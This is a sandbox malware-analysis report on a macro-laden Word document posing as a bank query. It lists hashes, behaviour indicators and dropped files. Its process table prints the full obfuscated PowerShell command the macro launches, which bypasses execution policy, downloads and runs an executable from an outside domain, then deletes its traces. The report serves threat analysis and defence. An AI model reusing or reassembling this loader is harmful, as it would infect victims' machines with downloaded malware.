analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Bankquery_F01CITIGB2LO890.doc

Full analysis: https://app.any.run/tasks/46437900-1790-488f-aa49-db68a03ea07f
Verdict: Malicious activity
Analysis date: December 14, 2018, 15:32:05
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-close
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Little Pig, Template: Normal, Last Saved By: Windows User, Revision Number: 6, Name of Creating Application: Microsoft Office Word, Total Editing Time: 25:00, Create Time/Date: Fri Dec 14 03:47:00 2018, Last Saved Time/Date: Fri Dec 14 11:23:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

F2A0F32103D18A22BACCB8BEB49E8842

SHA1:

535ACAB98D3945415918C96A401665EA487F9467

SHA256:

F275889EF0DDC8F71A2976012C292E7582600361FD0B29CFAE54E31001A6EA3B

SSDEEP:

3072:4fnUfnxCHcNySimxyO8ebDk3j4CL/8orHk6mssQA8y4Q7S9JfHc+K1E7Gj0XR:yex5Ny+xyOX44O0rxnQO49v8+K2GQX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • opwgjqrdq.exe (PID: 3684)

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3172)

    • Executable content was dropped or overwritten

      • WINWORD.EXE (PID: 3172)

  • SUSPICIOUS

    No suspicious indicators.

  • INFO

    • Dropped object may contain Bitcoin addresses

      • WINWORD.EXE (PID: 3172)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3172)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3172)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: Little Pig
Keywords: -
Template: Normal
LastModifiedBy: Windows User
RevisionNumber: 6
Software: Microsoft Office Word
TotalEditTime: 25.0 minutes
CreateDate: 2018:12:14 03:47:00
ModifyDate: 2018:12:14 11:23:00
Pages: 1
Words: -
Characters: 1
Security: None
CodePage: Unicode (UTF-8)
Company: Microsoft
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 1
AppVersion: 15
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
HeadingPairs:
  • Title
  • 1
  • Название
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
32
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
drop and start start winword.exe opwgjqrdq.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3172"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Bankquery_F01CITIGB2LO890.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3684"C:\Users\admin\AppData\Local\Temp\vuwln\opwgjqrdq.exe" $fatsdoejsmwviksttmmrmjbapm='$pa';$ixqjvizuyaxiuiadcesrs='= ''esh';$zcyiwzjgwghlkmigsgbtvmsbuou04='roce';$dgaoantyxhwyqhosetlyuthy='erh'';Set-';$uixqgmfcusnkugeqjixcdddnyo=' ''\';$inujsfenwiuxtzxxy='w-Objec';$tjoaeeehaioeatitbbie='h=(f7f81a39-5f63-5b42-9efd-1f13b5431005#39;;$enraiophlpooaowlpbmcu='vuwln'')';$oeehpaexsyfpazbenk='ss; $pat';$detuyfajximwispw='s $path;R';$ylaldgbbyuyvykwiewdkauu='(''https';$yajxauywyeffjhw='t Syst';$eumaptrpfkrzauaurkfabdqju90='t-Proces';$zdxvcaonbocnyyxcnnyxxo='emo';$xxqrgnohhhrrynvlgjxjjq3='$en';$oemlzprozqsxsukcg='cy Byp';$kscsioyrqlaauyruao='m.exe'',';$iacbqrlafwmmyqzhm=' -force;';$xkxcdlthaimrzanztkc0='ent';$fnibyyimvuuvkkxb40='ile';$ysnbkaqkpjlmmwwvrieomdretredm='ass -Scop';$utzpduyaoktitgjbddpso='env:te';$usutyzyacojzst='xe'');';$fnlunxmejjiayyztjcaruvvf74='heh ';$iesxxhhonsztacuywtb='dmy.e';$kknavgjihlypsaru='lclub';$mxldyuhvoziuoueu='ionPoli';$ujwueywoiieqxii=' -recurse';$sqztnpdiyknvruungfxfob9='Star';$zliucnthuievwlieirmnd='mp+';$stecwerctloadif='Execut';$utsrqouejuiemfez='et.Webcli';$agmrtdopxvzqncnielzsyspkba='$rb';$ivkdyxarcqpaixipvznju9=').Downl';$biraleqoosjuyugeq='://wa';$ioitprwatxacvlejgvniea='(Ne';$ubakcyieavarweoamgg='.com/f';$fjehwklrayabewoiiumclwc60='ve-Item (';$ubjjmeyyiyiwcnznfqo='ile/dw';$iobgimwmauzufmiuxobafz='e P';$ickzixqoyinkgpclbfryfo='oadF';$qixbqbfjabtfwymxebpmwpzbmhln='em.N';$icgzkxdyjqqwvuyuwxxxopse08='th); ';$qmoiaiyuyeptnwvlg='v:temp +';$cuoopnzlsrxeedfhigusez='teroi';$xmduafsdsualmleajuecjey05='ers';$npaqnzyeoeibxvuo='''\einmrm'; Invoke-Expression ($agmrtdopxvzqncnielzsyspkba+$xmduafsdsualmleajuecjey05+$fnlunxmejjiayyztjcaruvvf74+$ixqjvizuyaxiuiadcesrs+$dgaoantyxhwyqhosetlyuthy+$stecwerctloadif+$mxldyuhvoziuoueu+$oemlzprozqsxsukcg+$ysnbkaqkpjlmmwwvrieomdretredm+$iobgimwmauzufmiuxobafz+$zcyiwzjgwghlkmigsgbtvmsbuou04+$oeehpaexsyfpazbenk+$tjoaeeehaioeatitbbie+$utzpduyaoktitgjbddpso+$zliucnthuievwlieirmnd+$npaqnzyeoeibxvuo+$iesxxhhonsztacuywtb+$usutyzyacojzst+$ioitprwatxacvlejgvniea+$inujsfenwiuxtzxxy+$yajxauywyeffjhw+$qixbqbfjabtfwymxebpmwpzbmhln+$utsrqouejuiemfez+$xkxcdlthaimrzanztkc0+$ivkdyxarcqpaixipvznju9+$ickzixqoyinkgpclbfryfo+$fnibyyimvuuvkkxb40+$ylaldgbbyuyvykwiewdkauu+$biraleqoosjuyugeq+$cuoopnzlsrxeedfhigusez+$kknavgjihlypsaru+$ubakcyieavarweoamgg+$ubjjmeyyiyiwcnznfqo+$kscsioyrqlaauyruao+$fatsdoejsmwviksttmmrmjbapm+$icgzkxdyjqqwvuyuwxxxopse08+$sqztnpdiyknvruungfxfob9+$eumaptrpfkrzauaurkfabdqju90+$detuyfajximwispw+$zdxvcaonbocnyyxcnnyxxo+$fjehwklrayabewoiiumclwc60+$xxqrgnohhhrrynvlgjxjjq3+$qmoiaiyuyeptnwvlg+$uixqgmfcusnkugeqjixcdddnyo+$enraiophlpooaowlpbmcu+$ujwueywoiieqxii+$iacbqrlafwmmyqzhm);C:\Users\admin\AppData\Local\Temp\vuwln\opwgjqrdq.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 430
Read events
1 022
Write events
0
Delete events
0

Modification events

No data
Executable files
13
Suspicious files
0
Text files
121
Unknown types
2

Dropped files

PID
Process
Filename
Type
3172WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9030.tmp.cvr
MD5:
SHA256:
3172WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:7729D9A39977F1342500214BC949B7CA
SHA256:0F5EFD51D5A3DBFE9DDCA9059AB81204F940924C4A086D99F2B4F8B9F1A30EDB
3172WINWORD.EXEC:\Users\admin\AppData\Local\Temp\vuwln\DotNetTypes.format.ps1xmlxml
MD5:1AB2FD4B6749AD6831C86411FDCAFB48
SHA256:98540086CFC986D7604FFDED977EF20944D1715BF8453809CE736C919CB6E1EF
3172WINWORD.EXEC:\Users\admin\AppData\Local\Temp\vuwln\Diagnostics.Format.ps1xmltext
MD5:FF6EEB8125B9265C5BA40AF9F7C6F6BC
SHA256:7D569C1155CFA9B7BB2BA225EE409A55C8B0E8217F3A7E05BAA39DA1BD7C4689
3172WINWORD.EXEC:\Users\admin\AppData\Local\Temp\vuwln\CompiledComposition.Microsoft.PowerShell.GPowerShell.dllexecutable
MD5:A84B6952AB6A297CCE6C085FA8AB06CB
SHA256:54E3F8199D5C749920A2826C63D7C5E7E86D94874ADDCFD5C9B430671031017D
3172WINWORD.EXEC:\Users\admin\AppData\Local\Temp\vuwln\Certificate.format.ps1xmlxml
MD5:C93A361112351B30E2C959E72789952D
SHA256:4379BD59C1328A6811584D424DF3DC193A5D607E2859D3AC1655B9124A5F100D
3172WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$nkquery_F01CITIGB2LO890.docpgc
MD5:0AD601452AB0B719C6CA24BEDFFBC3CF
SHA256:EC5BEDB458A4DEC374C187B60EB4BB91F51BA25A1A22C3923373056710FD3A13
3172WINWORD.EXEC:\Users\admin\AppData\Local\Temp\vuwln\en-US\about_command_precedence.help.txttext
MD5:9B204318B2747400638FE5028E376100
SHA256:A79D0811C03FEB6129802426F53799CBA1A93C4BD204CE33E55BC180D3F0F132
3172WINWORD.EXEC:\Users\admin\AppData\Local\Temp\vuwln\en-US\about_CommonParameters.help.txttext
MD5:BD04B34656EDF637080E5B39AC179450
SHA256:5AA4D407219915FB2F87FAC21E309E9933CC98B6394A3B3D4873F5C139C48DA1
3172WINWORD.EXEC:\Users\admin\AppData\Local\Temp\vuwln\en-US\about_Break.help.txttext
MD5:AEDBFC39660AE3E030761ED4782CE328
SHA256:13231768182599EC2C15B281F5E313E36428327479DA7F05FF8A92C5479214F2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

Domain
IP
Reputation
wateroilclub.com
unknown

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Bankquery_F01CITIGB2LO890.doc